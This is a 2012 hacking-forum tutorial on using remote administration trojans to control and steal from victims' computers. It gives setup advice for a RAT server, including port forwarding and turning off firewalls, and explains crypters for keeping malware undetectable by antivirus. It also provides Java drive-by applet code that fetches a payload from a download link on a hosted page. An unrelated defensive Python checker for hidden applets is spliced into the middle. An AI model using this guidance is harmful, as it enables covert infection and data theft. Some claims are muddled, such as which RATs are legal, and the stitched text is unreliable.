☆Remote Administration Tool :: Tutorial :: Beginners Guide :: 12-25-2012, 11:38 AM
Remote Administration Tool Beginners Tutorial by Skiezo™
- What is a Remote Administration Tool?
- How do Remote administration Tools work?
- Port Forwarding on your Router
- What is a Crypter?
- Legal and Illegal RATs
- What is SandBoxie?
- How to use SandBoxie?
- What are Java drive-by's?
What is a Remote Administration Tool?
A RAT is the abbreviation of Remote Administration Tool. It is mostly used for malicious purposes, such as controlling PCs, stealing victims' data, or deleting or editing files. You can only infect someone by sending him the executable file you have created with your RAT, or by using a Java drive-by to make your victim activate the virus by running a Java applet.
How do Remote Administration Tools work?
A remote administration tool consists of an executable file and a client. The executable file runs on the controlled host computer and receives commands from the client, which is installed on another remote host. A remote administration tool works in the background and hides from the user. You can monitor the user's activity, manage files, install additional software, control the entire system including any present application or hardware device, modify essential system settings, turn off or restart the computer, and use fun abilities such as turning on webcams, changing wallpapers and much more.
Remote administration tools are divided into malicious and legitimate applications. Illegal RATs, also known as remote administration trojans, are analogous to backdoors and have very similar functionality. However, they aren't viral, do not propagate by themselves and usually do not have additional destructive functions or other dangerous payload. These malware-containing files do not work on their own and must be controlled by the client.
This is how you create your executable file in a RAT:
- BlackShades RAT
- Darkcomet RAT
- NetWire RAT
- CyberGate RAT
Port Forwarding on your Router
First of all you have to find your router's IP address information.
To view your IP address information, do these two steps:
- Start > Run, then type CMD and press Enter.
- Then type in your Command Prompt: ipconfig /all
You should see your network interface with a list of IP addresses (they should not all be 0.0.0.0). If you got an IP starting with 192.168... or 10.0..., that's very good. Find the Gateway IP address; this is the router's IP address.
It may be one of the following addresses shown in your CMD. If you have no clue, try one of the following:
- 192.168.1.1
- 192.168.0.1
- 192.168.0.50
- 10.0.0.1
- 192.168.1.254
Common default logins (username - password):
- admin - No Password
- No Username - admin
- admin - password
Alternatively, you can search Google for your router model number; there are enough people on different forums who will have the right default password for your router.
Once you're logged in on your router, first go to UPnP (Universal Plug & Play) and enable it. You may also disable the firewall on your router and on your Windows computer, so that the ports you have forwarded for your RAT do not get closed again.
Port forwarding is the process needed to forward different types of Internet connections into your network. Understand that the router is protecting your network by segmenting it, so it's doing its job. Port forwarding is one way to allow traffic into your network (manually), but now most routers and devices allow UPnP. Despite some possible security risks, it has been very popular and useful in peer-to-peer applications like uTorrent. Port forwarding is necessary because your router is designed to automatically reject any inbound connection that you didn't initiate.
So if you want to RAT or play an online game, you need to set up your ports first; then you will be able to connect to them and, conversely, they can connect to you. If the router is toggled into a "game" mode or similar, it will create lag at the beginning as it attempts to learn what you are doing. This isn't ideal.
You can use any common ports if you'd like to port forward for a RAT.
This can be many ports; a recommendation would be a port number over 1000.
Some example ports:
- 2000
- 2001
- 3080
- 3081
- 1604
- 1337
For ratting you have to make sure you use TCP+UDP as your protocols, because RATs use a lot of features and some of them require UDP instead of the TCP that is needed for the connections. You also have to make sure that you use the IPv4 address of your host computer.
Different computer accounts will not have the same IPv4 address!
If you do not have the same router as I have, search Google for your router model number. Most routers that you need to port forward on can be found on http://PortForward.com. That website provides a good tutorial on how to port forward for your router. It's noob-friendly and almost all routers are on there.
What is a Crypter?
Crypters are computer applications which are most of the time used to bypass antivirus detection of malware. Crypters are used to hide viruses, trojans, RATs, keyloggers and other hack tools inside a new executable file. The purpose is to bypass antivirus detection of those files. Crypters are basically coded in VB, C++ and other programming languages. They just hide the actual program behind their encryption so that the antivirus doesn't detect the file. Most antiviruses detect viruses on the basis of heuristics and normal string-based detection. Since we crypted the original program, the antivirus stands lame and does not detect it as a virus.
Fully Undetectable or Undetectable:
- Fully undetectable (FUD) means that your virus is not detected by any of the existing antiviruses.
- Undetectable (UD) means it is detected by a few of the existing antiviruses.
A crypter will remain FUD until you have shared it online. Public crypters remain FUD for a maximum of 2 to 3 days, then they become UD. So if you want to use a crypter for a long time, you should never publish it online.
Stub:
A stub is a small piece of code which contains certain basic functionality that is used again and again. It is similar to a package in Java or simply to header files in C. A stub basically simulates the functionality of existing code, like procedures on remote machines or simply on PCs. In crypters, the client-side server is validated using stubs, so never delete the stub file from your crypter. Stubs add portability to the crypter code, so that it can be used on any machine without requiring many procedures and resources on other machines.
Let me explain with a small example:
Suppose you are writing code that converts bytes to bits. We know the formula for converting bytes to bits will remain the same and is independent of the machine. So our stub (or method stub, or procedure) will contain something like this:
Code:
BEGIN calculateBits(inputBytes)
    totalBits = inputBytes * 8
    RETURN totalBits
END
Now all we pass to this stub is the number of bytes, and it returns the resulting bits. Similarly, we include some common machine-independent checks and functions in our stub, and in the main code we only pass linkage and inputs to these stubs, which in return provide suitable results.
It happens often that you download some keylogger and complain to the provider that it's not working; the only reason for that is the stub.
There are 4 different kinds of crypters:
- External stub based crypters
- Internal or inbuilt stub based crypters
- Run time crypters
- Scan time crypters
External stub based crypters: most of you have downloaded a public crypter by now, and when you open the folder you have seen 2 files:
Client.exe & Stub.exe
These types of crypters are called external crypters; the functionality of the crypter depends almost entirely on the external stub.
Delete the stub and the crypter is useless.
Internal or inbuilt stub based crypters:
The crypters that contain only one EXE file (i.e. the client) fall under this category. This client file has the stub built in. You can separate the stub and client part here too using RCE (Reverse Code Engineering), but it is not recommended.
Run time crypters: run time crypters are the crypters which remain undetected in memory during their execution. We are looking for these types of crypters only. These can be either external stub based crypters or internal/inbuilt stub based crypters.
Scan time crypters: the crypters that crypt a server so that it remains undetectable when scanned by antiviruses, but gets detected by the antivirus when run on the PC.
Legal & Illegal RATs
There are illegal RATs but also legal RATs. You might be thinking: what? Since when are there legal RATs? I will list here the RATs that are legal and created by members of Anarchy or other forums, and the RATs that are illegal and coded by official companies.
Illegal RATs:
- Cerberus Rat
- ProRat
- Poison Ivy
- BlackShades
- Darkcomet RAT
Legal RATs:
- Teamviewer
- NetWire RAT
- Darkcomet 5.4 Legacy
- Ultra VNC
- Ammyy Admin
- Mikogo
What is Sandboxie?
Sandboxie is a sandboxing tool used to run programs in a sandbox environment; it can be very useful when using RATs.
Many people use it to run their RAT server. Sandboxie is not just for RATs though; it can be used to test suspicious files.
Sandboxie is a great tool, however you cannot use it with DarkComet if you enable the Firewall-Bypass feature.
Sandboxie can also sandbox a web browser. I have personally not used this feature much, but it may be useful.
Sandboxie is a free program for thirty days. After that you must wait a few seconds before sandboxing the program you want.
Sandboxie: www.sandboxie.com
How to use Sandboxie?
Sandboxie can be reached from the system notification tray area of your taskbar.
When active, you can use the Sandboxie tray icon to hide and show the main window of Sandboxie Control by double-clicking the icon. Or you can right-click the icon and select the first command, which alternates between:
- Hide Window
- Show Window
You can view this tutorial in a sandboxed web browser. To do that, use the Getting Started Tutorial (Web) command in the Help menu of Sandboxie Control, and make sure you tell Sandboxie Control to run your browser sandboxed:
You can download and install Sandboxie here. When you are done, do the following:
- Right-click on your server.
- Click "Run Sandboxed".
What is a Java drive-by?
A Java drive-by is basically a popup that asks for permission to run a Java applet. When this applet is accepted and run, a .jar file will activate a virus. This way, your virus will be run without the slave even seeing the virus. All he has to do is accept a Java popup.
The applet code must be added to your index file, which is then uploaded to your webhost to build your website.
This is an example of applet code, which you will need to add to your index.html:
Code:
<applet name='APPLET NAME' width='1' height='1' code='java.class' archive='java.jar'><param name="funtime" value="DIRECT LINK HERE"></applet>
Java drive-by chain:
Slave sees a popup > accepts popup > popup activates a .jar file > .jar file activates a virus.
If you have added an applet to your index.html, you should see a yellow bar at the top of your Java drive-by.
A successful Java drive-by should look like this when running the Java applet:
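The pattern above (a 1x1 applet that loads a .jar and takes a download link as a param) is exactly what a web host or site owner can scan uploaded pages for. The following checker is an added example, not code from the tutorial; the sample HTML is constructed and example.invalid is a placeholder host.

```python
from html.parser import HTMLParser

# Constructed sample page (not from any real site): one hidden 1x1 applet
# loading a .jar with a URL parameter, plus a normal visible applet.
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<applet name='APPLET NAME' width='1' height='1' code='java.class' archive='java.jar'>
<param name="funtime" value="http://example.invalid/payload.exe"></applet>
<applet code='Game.class' archive='game.jar' width='640' height='480'></applet>
</body></html>"""

class AppletAuditor(HTMLParser):
    """Collects every <applet> tag together with its <param> children."""
    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "applet":
            self._current = {"attrs": attrs, "params": {}}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "")] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None

def _px(value):
    """Parse a width/height attribute; None if it is not a plain number."""
    try:
        return int(str(value).strip().rstrip("px"))
    except ValueError:
        return None

def find_hidden_applets(html, max_px=10):
    """Flag applets that are effectively invisible (tiny width and height)
    or pass an http(s) URL in a <param>: the traits of the drive-by above."""
    auditor = AppletAuditor()
    auditor.feed(html)
    flagged = []
    for a in auditor.applets:
        w, h = _px(a["attrs"].get("width", "")), _px(a["attrs"].get("height", ""))
        tiny = w is not None and h is not None and w <= max_px and h <= max_px
        url_param = any(str(v).lower().startswith(("http://", "https://"))
                        for v in a["params"].values())
        if tiny or url_param:
            flagged.append({"archive": a["attrs"].get("archive"),
                            "tiny": tiny, "url_param": url_param})
    return flagged
```

Running find_hidden_applets(SAMPLE_HTML) flags only the 1x1 java.jar applet; the 640x480 game applet passes.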
Free Webhosts
Paid Webhosts:
- http://www.inmotionhosting.com
- http://www.ipage.com/
- http://www.justhost.com/
- http://www.bluehost.com/
Now there are 2 ways of accessing your File Manager to upload your files to your webhost:
- FileZilla
- The webhost's own File Manager.
I will be using the first one, as that is much easier when copying and pasting the files into the File Manager.
If you have lots of files to upload that contain images, I suggest going for FileZilla.
FileZilla can be downloaded here.
Once you have downloaded FileZilla, go to your webhost and find something similar to ''Details''.
Once you have found that, search for the FTP Transfer Details.
Type the FTP details into FileZilla.
For ''Host'' you'll be using your FTP IP or your FTP hostname; you can use either of those to enter your File Manager. For username you'll be using the FTP username, for password your FTP password, and for port your FTP port, which is most likely 21 on a lot of webhosts.
This tutorial has been made by a member of Anarchy: Skiezo™